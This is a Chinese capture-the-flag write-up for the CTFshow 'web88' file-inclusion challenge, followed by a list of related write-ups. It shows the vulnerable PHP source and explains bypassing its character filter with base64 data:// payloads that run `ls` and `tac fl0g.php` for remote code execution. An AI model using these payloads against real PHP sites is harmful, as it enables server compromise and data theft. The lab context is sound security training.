源码

<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-17 02:27:25
# @email: h1xa@ctfer.com
# @link: https://ctfer.com*/
if(isset($_GET['file'])){$file = $_GET['file'];if(preg_match("/php|\~|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\_|\+|\=|\./i", $file)){die("error");}include($file);
}else{highlight_file(__FILE__);
}

思路

只过滤了php,我们可以用data伪协议,base64绕过,但是还有一个问题,+和=号是被过滤的,而<?php echols?>的base64加密有等号,我们可以在后面加入1来混淆

我们可以在后面加入1来混淆

?file=data://text/plain;base64,PD9waHAgZWNobyBgbHNgPz4xMTEx
成功绕过

可以尝试下怎么不出现 + 和 =

<?php echo `tac fl0g.php`;?>11

?file=data://text/plain;base64,PD9waHAgZWNobyBgdGFjIGZsMGcucGhwYDs/PjEx
拿到flag

题解

################################

总结

水题

CTFshow 文件包含 web88相关推荐

ctfshow 文件包含Web78-79
Ctfshow文件包含漏洞 2022/4/15 漏洞简介: 文件包含函数的参数没有经过过滤或者严格的定义,并且参数可以被用户控制,这样就可能包含非预期的文件.如果文件中存在恶意代码,无论文件是什么类型 ...
CTFshow 文件包含 web82
目录源码思路题解总结源码 <?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # ...
CTFshow 文件包含 web80
目录源码思路题解总结源码 <?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # ...
ctfshow 文件包含 web 78 -117
目录 web 78 web 79 web 80 web 81 web 82-86(环境暂时做不了) web 87 web 88 web 116 web 117 web 78 data://text/p ...
CTFshow 文件包含 web116
目录源码思路题解总结源码下载视频用winhex分离出png 思路可以正常读文件题解直接跑字典总结水题
CTFshow 文件包含 web87
目录源码思路题解题解一题解二总结源码 <?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11: ...
CTFshow 文件包含 web81
目录源码思路题解总结源码 <?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # ...
CTFshow 文件包含 web117
目录源码思路题解总结源码 <?php/* # -*- coding: utf-8 -*- # @Author: yu22x # @Date: 2020-09-16 11:25:09 # ...
CTFshow 文件包含 web79
目录源码思路题解总结源码 <?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:10:14 # ...

CTFshow 文件包含 web88

目录

源码

思路

题解

总结

CTFshow 文件包含 web88相关推荐

最新文章

热门文章